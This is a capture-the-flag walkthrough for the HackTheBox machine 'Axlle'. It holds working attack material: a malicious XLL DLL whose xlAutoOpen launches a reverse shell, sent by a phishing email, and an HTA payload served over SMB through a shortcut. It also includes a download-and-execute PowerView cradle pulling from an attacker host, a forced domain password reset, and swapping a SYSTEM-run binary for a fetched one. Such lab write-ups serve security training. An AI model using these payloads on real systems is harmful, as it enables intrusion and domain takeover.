Hackthebox - Axlle

0x1 Initial Access

  • XLL-EXEC Click Here
  • Modify the exploit:
#include <windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    WinExec("PowerShell#3 from revshells.com", 1);
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  • Compile the DLL
x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll exploit.c -luser32
  • Send the Exploit via Email
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll

0x2 User Privilege

  • Phishing Email from the Web Dev Team
Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

  • Create an HTA file with a PowerShell reverse shell command embedded.
  • shell.hta Click Here
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
        var c = "Reverse Shell Commands";  
        new ActiveXObject('WScript.Shell').Run(c, 0, true); 
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
  • Serve the HTA file on an SMB server.
impacket-smbserver -smb2support share .
  • Create a shortcut file pointing to the HTA file:
[InternetShortcut]
URL=file://YOUR_IP/share/shell.hta
$url = "file://YOUR_IP/share/shell.hta"
$shortcutPath = "C:\inetpub\testing\shell.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
  • Get shell as dallon.matrix
PS C:\> whoami
axlle\dallon.matrix
  • Get user.txt
  • Use Bloodhound to analyze Active Directory permissions and relationships
  • Use the PowerView module to change the password of another user in the domain (e.g., Jacob.greeny) who has the right to force other users to change their passwords.
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
  • Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
  • Gain access to Jacob.greeny

0x3 Shell as Jacob.Greeny

  • README.md Note
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
  • Checking Permissions
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> icacls standalonerunner.exe
standalonerunner.exe AXLLE\App Devs:(I)(RX,W)
                     Everyone:(I)(R)
                     AXLLE\Administrator:(I)(F)

0x4 Root Access (Intended)

  • Arbitrary Command Execution Via Windows Kit’s StandaloneRunner: Read Here
  • Create reboot.rsf File:
myTestDir
True
  • Mimic Directory Structure:
mkdir myTestDir
mkdir myTestDir\working
  • Create an empty rsf.rsf file inside myTestDir\working
  • Create command.txt with the reverse shell command in the same directory as standalonerunner.exe
  • Wait for the standalonerunner.exe to execute
  • Get shell as root, read root.txt

0x5 Unintended Root

  • Replace standalonerunner.exe with malicious .exe to gain access as Administrator
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> wget http://YOUR_IP/standalonerunner.exe -o standalonerunner.exe
  • Get a metasploit session as Administrator
  • Read root.txt